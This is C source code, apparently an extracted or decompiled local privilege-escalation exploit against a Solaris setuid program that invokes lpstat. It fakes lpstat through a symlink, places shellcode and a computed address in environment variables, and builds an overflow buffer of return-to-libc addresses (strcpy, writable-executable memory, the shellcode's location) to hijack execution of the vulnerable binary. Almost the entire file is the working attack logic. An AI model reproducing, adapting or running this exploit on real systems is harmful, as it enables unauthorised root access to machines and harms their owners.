
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int release ;
typedef int platform ;
typedef int buf ;


 int BUFSIZE ;
 char* INFO1 ;
 char* INFO2 ;
 int SI_PLATFORM ;
 int SI_RELEASE ;
 char* VULN ;
 int add_env (char*) ;
 char** env ;
 int env_len ;
 int env_pos ;
 int execve (char*,char**,char**) ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 int getenv (char*) ;
 int memset (char*,char,int) ;
 int perror (char*) ;
 int printf (char*,char*) ;
 char* sc ;
 int search_ldso (char*) ;
 int search_rwx_mem () ;
 int set_val (char*,int,int) ;
 int sprintf (char*,char*,...) ;
 int stderr ;
 int strcmp (char*,char*) ;
 int strlen (char*) ;
 scalar_t__ strtoul (int ,char**,int ) ;
 int symlink (char*,char*) ;
 int sysinfo (int ,char*,int) ;
 int unlink (char*) ;

int main(int argc, char **argv)
{
 char buf[BUFSIZE], ksh_var[16];
 char platform[256], release[256], display[256];
 int i, offset, sc_addr, ksh_pos;
 int plat_len, prog_len;

 char *arg[2] = {"foo", ((void*)0)};
 int sb = ((int)argv[0] | 0xfff);
 int ret = search_ldso("strcpy");
 int rwx_mem = search_rwx_mem();


 if (!strcmp(argv[0], "lpstat")) {


  if (argc != 2)
   exit(1);


  sc_addr = (int)strtoul(getenv("KSH"), (char **)((void*)0), 0);


  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf) - 1] = 0x0;


  for (i = 0; i < BUFSIZE; i += 4) {
   set_val(buf, i, ret);
   set_val(buf, i += 4, rwx_mem);
   set_val(buf, i += 4, rwx_mem);
   set_val(buf, i += 4, sc_addr);
  }


  if(!strcmp(argv[1], "-v")) {
   fprintf(stderr, "lpstat called with -v\n");
   printf("device for %s: /dev/null\n", buf);
  } else {
   fprintf(stderr, "lpstat called with -d\n");
   printf("system default destination: %s\n", buf);
  }
  exit(0);
 }


 fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);


 if (argc != 2) {
  fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
  exit(1);
 }
 sprintf(display, "DISPLAY=%s", argv[1]);


 sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
 sysinfo(SI_RELEASE, release, sizeof(release) - 1);


 add_env(sc);
 ksh_pos = env_pos;
 add_env("KSH=0x42424242");
 add_env(display);
 add_env("PATH=.:/usr/bin");
 add_env("HOME=/tmp");
 add_env(((void*)0));


 plat_len = strlen(platform) + 1;
 prog_len = strlen(VULN) + 1;
 offset = 5 + env_len + plat_len + prog_len;


 sc_addr = sb - offset;


 sprintf(ksh_var, "KSH=0x%x", sc_addr);
 env[ksh_pos] = ksh_var;


 unlink("lpstat");
 symlink(argv[0], "lpstat");


 fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
 fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
 fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
 fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
 fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);


 execve(VULN, arg, env);
 perror("execve");
 exit(0);
}
